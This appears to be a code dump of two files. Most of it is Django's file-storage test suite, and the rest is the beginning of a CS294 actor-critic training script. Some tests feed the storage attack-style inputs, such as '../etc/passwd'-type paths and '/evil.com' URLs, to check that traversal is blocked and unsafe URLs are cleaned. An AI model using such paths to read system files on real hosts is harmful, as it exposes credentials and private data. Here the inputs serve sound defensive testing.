self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_off(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5.
self.assertFalse(self.storage.exists('test.file.tz.off'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.off', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be naive, in system (+1) TZ
self.assertTrue(timezone.is_naive(dt))
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and naive_now should be the same effective time.
self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
# If we convert dt to an aware object using the Algiers
# timezone then it should be the same effective time to
# now_in_algiers.
_dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
atime = self.storage.get_accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
ctime = self.storage.get_created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.get_modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file', ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
@unittest.skipUnless(symlinks_supported(), 'Must be able to symlink to run this test.')
def test_file_save_broken_symlink(self):
"""A new path is created on save when a broken symlink is supplied."""
nonexistent_file_path = os.path.join(self.temp_dir, 'nonexistent.txt')
broken_symlink_path = os.path.join(self.temp_dir, 'symlink.txt')
os.symlink(nonexistent_file_path, broken_symlink_path)
f = ContentFile('some content')
f_name = self.storage.save(broken_symlink_path, f)
self.assertIs(os.path.exists(os.path.join(self.temp_dir, f_name)), True)
def test_save_doesnt_close(self):
with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
file.write(b'1')
file.seek(0)
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
with file:
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the web.
"""
self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(
self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
"/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
)
self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")
# #25905: remove leading slashes from file names to prevent unsafe url output
self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
"""
File storage returns a url even when its base_url is unset or modified.
"""
self.storage.base_url = None
with self.assertRaises(ValueError):
self.storage.url('test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
self.addCleanup(self.storage.delete, 'storage_test_1')
self.addCleanup(self.storage.delete, 'storage_test_2')
for directory in ('', Path('')):
with self.subTest(directory=directory):
dirs, files = self.storage.listdir(directory)
self.assertEqual(set(dirs), {'storage_dir_1'})
self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('..')
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path, mode=0o777, exist_ok=False):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path, mode, exist_ok)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path, mode, exist_ok)
if not exist_ok:
raise FileExistsError()
elif path == os.path.join(self.temp_dir, 'error'):
raise PermissionError()
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file', ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file', ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Exceptions aside from FileExistsError are raised.
with self.assertRaises(PermissionError):
self.storage.save('error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, 'error.file'):
raise PermissionError()
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# Exceptions aside from FileNotFoundError are raised.
self.storage.save('error.file', ContentFile('delete with error'))
with self.assertRaises(PermissionError):
self.storage.delete('error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise OSError
f1.chunks = failing_chunks
with self.assertRaises(OSError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
msg = 'The name must be given to delete().'
with self.assertRaisesMessage(ValueError, msg):
self.storage.delete(None)
with self.assertRaisesMessage(ValueError, msg):
self.storage.delete('')
def test_delete_deletes_directories(self):
tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
self.storage.delete(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
@override_settings(
MEDIA_ROOT='media_root',
MEDIA_URL='media_url/',
FILE_UPLOAD_PERMISSIONS=0o777,
FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
"""
Properties using settings values as defaults should be updated on
referenced settings change while specified values should be unchanged.
"""
storage = self.storage_class(
location='explicit_location',
base_url='explicit_base_url/',
file_permissions_mode=0o666,
directory_permissions_mode=0o666,
)
defaults_storage = self.storage_class()
settings = {
'MEDIA_ROOT': 'overridden_media_root',
'MEDIA_URL': '/overridden_media_url/',
'FILE_UPLOAD_PERMISSIONS': 0o333,
'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
}
with self.settings(**settings):
self.assertEqual(storage.base_location, 'explicit_location')
self.assertIn('explicit_location', storage.location)
self.assertEqual(storage.base_url, 'explicit_base_url/')
self.assertEqual(storage.file_permissions_mode, 0o666)
self.assertEqual(storage.directory_permissions_mode, 0o666)
self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
self.assertEqual(
defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
)
def test_file_methods_pathlib_path(self):
p = Path('test.file')
self.assertFalse(self.storage.exists(p))
f = ContentFile('custom contents')
f_name = self.storage.save(p, f)
# Storage basic methods.
self.assertEqual(self.storage.path(p), os.path.join(self.temp_dir, p))
self.assertEqual(self.storage.size(p), 15)
self.assertEqual(self.storage.url(p), self.storage.base_url + f_name)
with self.storage.open(p) as f:
self.assertEqual(f.read(), b'custom contents')
self.addCleanup(self.storage.delete, p)
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
basename, *ext = os.path.splitext(name)
number = 2
while self.exists(name):
name = ''.join([basename, '.', str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class OverwritingStorage(FileSystemStorage):
"""
Overwrite existing files instead of appending a suffix to generate an
unused name.
"""
# Mask out O_EXCL so os.open() doesn't raise OSError if the file exists.
OS_OPEN_FLAGS = FileSystemStorage.OS_OPEN_FLAGS & ~os.O_EXCL
def get_available_name(self, name, max_length=None):
"""Override the effort to find an used name."""
return name
class OverwritingStorageTests(FileStorageTests):
storage_class = OverwritingStorage
def test_save_overwrite_behavior(self):
"""Saving to same file name twice overwrites the first file."""
name = 'test.file'
self.assertFalse(self.storage.exists(name))
content_1 = b'content one'
content_2 = b'second content'
f_1 = ContentFile(content_1)
f_2 = ContentFile(content_2)
stored_name_1 = self.storage.save(name, f_1)
try:
self.assertEqual(stored_name_1, name)
self.assertTrue(self.storage.exists(name))
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
with self.storage.open(name) as fp:
self.assertEqual(fp.read(), content_1)
stored_name_2 = self.storage.save(name, f_2)
self.assertEqual(stored_name_2, name)
self.assertTrue(self.storage.exists(name))
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
with self.storage.open(name) as fp:
self.assertEqual(fp.read(), content_2)
finally:
self.storage.delete(name)
class DiscardingFalseContentStorage(FileSystemStorage):
def _save(self, name, content):
if content:
return super()._save(name, content)
return ''
class DiscardingFalseContentStorageTests(FileStorageTests):
storage_class = DiscardingFalseContentStorage
def test_custom_storage_discarding_empty_content(self):
"""
When Storage.save() wraps a file-like object in File, it should include
the name argument so that bool(file) evaluates to True (#26495).
"""
output = StringIO('content')
self.storage.save('tests/stringio', output)
self.assertTrue(self.storage.exists('tests/stringio'))
with self.storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, 'PC_NAME_MAX')
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
with obj.normal as normal:
normal.open('wb')
normal.write(b'updated')
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b'updated')
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename get truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform == 'win32',
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_pathlib_upload_to(self):
obj = Storage()
obj.pathlib_callable.save('some_file1.txt', ContentFile('some content'))
self.assertEqual(obj.pathlib_callable.name, 'bar/some_file1.txt')
obj.pathlib_direct.save('some_file2.txt', ContentFile('some content'))
self.assertEqual(obj.pathlib_direct.name, 'bar/some_file2.txt')
obj.random.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as Python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FieldCallableFileStorageTests(SimpleTestCase):
def setUp(self):
self.temp_storage_location = tempfile.mkdtemp(suffix='filefield_callable_storage')
def tearDown(self):
shutil.rmtree(self.temp_storage_location)
def test_callable_base_class_error_raises(self):
class NotStorage:
pass
msg = 'FileField.storage must be a subclass/instance of django.core.files.storage.Storage'
for invalid_type in (NotStorage, str, list, set, tuple):
with self.subTest(invalid_type=invalid_type):
with self.assertRaisesMessage(TypeError, msg):
FileField(storage=invalid_type)
def test_file_field_storage_none_uses_default_storage(self):
self.assertEqual(FileField().storage, default_storage)
def test_callable_function_storage_file_field(self):
storage = FileSystemStorage(location=self.temp_storage_location)
def get_storage():
return storage
obj = FileField(storage=get_storage)
self.assertEqual(obj.storage, storage)
self.assertEqual(obj.storage.location, storage.location)
def test_callable_class_storage_file_field(self):
class GetStorage(FileSystemStorage):
pass
obj = FileField(storage=GetStorage)
self.assertIsInstance(obj.storage, BaseStorage)
def test_callable_storage_file_field_in_model(self):
obj = Storage()
self.assertEqual(obj.storage_callable.storage, temp_storage)
self.assertEqual(obj.storage_callable.storage.location, temp_storage_location)
self.assertIsInstance(obj.storage_callable_class.storage, BaseStorage)
def test_deconstruction(self):
"""
Deconstructing gives the original callable, not the evaluated value.
"""
obj = Storage()
*_, kwargs = obj._meta.get_field('storage_callable').deconstruct()
storage = kwargs['storage']
self.assertIs(storage, callable_storage)
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], 'conflict')
self.assertRegex(files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform == 'win32', "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save('the_directory/subdir/the_file', ContentFile('data'))
file_path = Path(self.storage.path(name))
self.assertEqual(file_path.parent.stat().st_mode & 0o777, 0o765)
self.assertEqual(file_path.parent.parent.stat().st_mode & 0o777, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save('the_directory/subdir/the_file', ContentFile('data'))
file_path = Path(self.storage.path(name))
expected_mode = 0o777 & ~self.umask
self.assertEqual(file_path.parent.stat().st_mode & 0o777, expected_mode)
self.assertEqual(file_path.parent.parent.stat().st_mode & 0o777, expected_mode)
class FileStoragePathParsing(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], 'test')
self.assertRegex(files[1], 'test_%s' % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], '.test')
self.assertRegex(files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
ContentFile can be saved correctly with the filesystem storage,
if it was initialized with either bytes or unicode content.
"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib_request_urlopen(self):
"""
Test the File storage API with a file-like object coming from
urllib.request.urlopen().
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
train_ac_f18.py | """
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
"""
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
# YOUR HW2 CODE HERE
with tf.variable_scope(scope):
x = input_placeholder
for i in range(n_layers):
x = tf.layers.dense(
inputs=x,
units=size,
activation=activation,
)
output_placeholder = tf.layers.dense(
inputs=x,
units=output_size,
activation=output_activation,
)
return output_placeholder
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_AC)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.num_target_updates = computation_graph_args['num_target_updates']
self.num_grad_steps_per_target_update = computation_graph_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # may need if using GPU
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
